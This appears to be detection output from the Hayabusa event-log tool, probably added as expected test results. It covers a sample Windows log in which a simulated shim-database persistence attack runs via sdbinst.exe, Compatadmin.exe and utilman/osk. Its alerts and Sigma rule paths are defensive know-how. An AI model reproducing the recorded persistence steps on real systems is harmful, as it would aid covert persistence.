+2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1472 | PGUID: 365ABB72-5384-5C91-0000-0010F5D70100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1564 | PGUID: 365ABB72-53A2-5C91-0000-00101FE20100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1744 | PGUID: 365ABB72-53A2-5C91-0000-001093E70100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1600 | PGUID: 365ABB72-53C0-5C91-0000-001044FC0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1904 | PGUID: 365ABB72-53DE-5C91-0000-00105C050200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1980 | PGUID: 365ABB72-53DE-5C91-0000-00104D160200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2040 | PGUID: 365ABB72-53DF-5C91-0000-0010452D0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2464 | PGUID: 365ABB72-53F2-5C91-0000-001081FE0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2640 | PGUID: 365ABB72-5418-5C91-0000-001089390300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2684 | PGUID: 365ABB72-5418-5C91-0000-0010BF400300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2692 | PGUID: 365ABB72-5418-5C91-0000-001076420300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2756 | PGUID: 365ABB72-5418-5C91-0000-0010784B0300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 2948 | PGUID: 365ABB72-543D-5C91-0000-00102FA20300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2960 | PGUID: 365ABB72-543D-5C91-0000-001099A30300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x33435 | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3068 | PGUID: 365ABB72-543E-5C91-0000-001009C90300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3080 | PGUID: 365ABB72-543E-5C91-0000-001096D00300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x33435 | PID: 3144 | PGUID: 365ABB72-543E-5C91-0000-001071E70300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3628 | PGUID: 365ABB72-546C-5C91-0000-00106A730400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2336 | PGUID: 365ABB72-550C-5C91-0000-001063E60400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | Process: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 2704 | PGUID: 365ABB72-551C-5C91-0000-001030590500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:46:25.856 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:47:56.436 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\cmd.exe | Process: C:\Windows\Explorer.EXE | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.459 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.509 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.559 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3612 | PGUID: 365ABB72-55A1-5C91-0000-00102D930700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:33.930 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3004 | PGUID: 365ABB72-55A4-5C91-0000-00103DA60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{d2c22380-b7b0-4d3a-b36e-bb0e804c265c}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.807 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.867 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.978 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3908 | PGUID: 365ABB72-55D7-5C91-0000-0010DDC30700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3648 | PGUID: 365ABB72-55D8-5C91-0000-001060C90700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:28.168 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4024 | PGUID: 365ABB72-55DB-5C91-0000-001094D60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
